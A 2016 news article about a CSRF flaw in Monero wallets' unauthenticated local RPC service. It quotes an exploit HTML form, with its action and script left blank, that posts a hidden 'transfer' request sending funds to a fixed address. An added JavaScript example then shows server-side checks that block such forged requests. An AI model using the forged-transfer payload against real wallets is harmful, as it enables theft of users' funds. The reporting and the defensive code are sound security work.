Monero Wallet Security Threat Fixed with the Latest Hotfix

September 20, 2016 | Bitcoin Business

Monero is slowly replacing Bitcoin as the preferred currency of the darknet. Thanks to the additional privacy and security features offered by its underlying CryptoNote protocol, it is much harder to track Monero transactions. However, a recent security alert has indicated that even though Monero transactions are safe and secure, the wallets aren't.

MWR Labs, a cybersecurity company, released an advisory earlier this month reporting a Cross-Site Request Forgery (CSRF) vulnerability. The vulnerability could potentially allow attackers to remotely steal Monero cryptocurrency from users running a vulnerable version of the wallet. The list of vulnerable wallets included Monero SimpleWallet, LightWallet, Wallet Chrome, GUI, Minonodo and other wallets for JS, NodeJS, and QT. All these vulnerable wallets were known to host an RPC web service on the local host, port 10802, which accepted requests to initiate payments without user authentication.

MWR Labs also posted in its advisory the code snippet that can be used to exploit the vulnerability:

    <html>
      <form action= method=post enctype="text/plain" name="pay" >
        <input name='{"jsonrpc":"2.0","id":"0","method":"transfer","params":{"destinations":[{"amount":100000000000,"address":"49FuXtv95dkZj5aDaoWkbjQRv9Qu6UMwAAJKP68vksbpRJEPNZfkr6Ecbj9wrqG4xHAiMArmpGsxRbkmxAC8NEydBEvc162"}],"fee":000000000000,"mixin":3,"unlock_time":0,"payment_id":"","get_tx_key":true}}' type='hidden'>
      </form>
      <script>     </script>
    </html>

Since the issue was made public, the team behind the Monero cryptocurrency has fixed it by releasing a hotfix. The hotfix, published on GitHub, is currently available only for the platform's own wallet versions. It is not clear whether any third-party wallet services were affected by the same vulnerability. Even if they were, whether the hotfix is applicable to their services is another question that still has to be answered.

Meanwhile, the Monero community should update their wallets to ensure their security. Those using third-party wallet services who are unsure about the security of their wallets should switch to native […]
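The server-side checks that stop a forged form post like the one above from reaching an unauthenticated local RPC listener, as an added example that is not taken from MWR Labs' advisory or from the Monero hotfix. The token, host list, function names and sample requests are assumptions constructed for illustration.

```javascript
// Added example: request gate for a local JSON-RPC wallet service.
// ALLOWED_HOSTS, TOKEN and both sample requests are constructed for illustration.
const ALLOWED_HOSTS = new Set(["127.0.0.1:10802", "localhost:10802"]);

// Constant-time comparison so the token check does not leak a prefix match.
function safeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

function deny(status, reason) { return { ok: false, status, reason }; }

// Returns { ok, status, reason }. Header names are expected in lower case.
function gateRpcRequest(req, token) {
  const h = req.headers;
  if (req.method !== "POST") return deny(405, "method");
  // DNS-rebinding defence: Host must name the loopback listener.
  if (!ALLOWED_HOSTS.has(h["host"] || "")) return deny(403, "host");
  // Modern browsers attach Origin to cross-site POSTs; a local CLI client sends none.
  if (h["origin"] !== undefined) return deny(403, "origin");
  // An HTML form can only send urlencoded, multipart or text/plain bodies.
  const ctype = (h["content-type"] || "").split(";")[0].trim().toLowerCase();
  if (ctype !== "application/json") return deny(415, "content-type");
  // A form cannot add an Authorization header, so a shared secret closes the hole.
  if (!safeEqual(h["authorization"] || "", "Bearer " + token)) return deny(401, "auth");
  // Strict parsing rejects the trailing "=" that a text/plain form appends.
  let msg;
  try { msg = JSON.parse(req.body); } catch (e) { return deny(400, "json"); }
  if (msg === null || typeof msg.method !== "string") return deny(400, "json");
  return { ok: true, status: 200, reason: "accepted", rpcMethod: msg.method };
}

// Constructed samples: what a browser sends for such a form, and a local client's call.
const TOKEN = "example-token-not-a-real-secret";
const forged = {
  method: "POST",
  headers: { "host": "localhost:10802", "origin": "http://attacker.example",
             "content-type": "text/plain" },
  body: '{"jsonrpc":"2.0","id":"0","method":"transfer","params":{}}=\r\n',
};
const local = {
  method: "POST",
  headers: { "host": "127.0.0.1:10802", "content-type": "application/json",
             "authorization": "Bearer " + TOKEN },
  body: '{"jsonrpc":"2.0","id":"0","method":"getbalance"}',
};
console.log(gateRpcRequest(forged, TOKEN), gateRpcRequest(local, TOKEN));
```

Each check fails closed on its own, so a request from an older browser that omits Origin is still rejected by the content-type and token checks.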

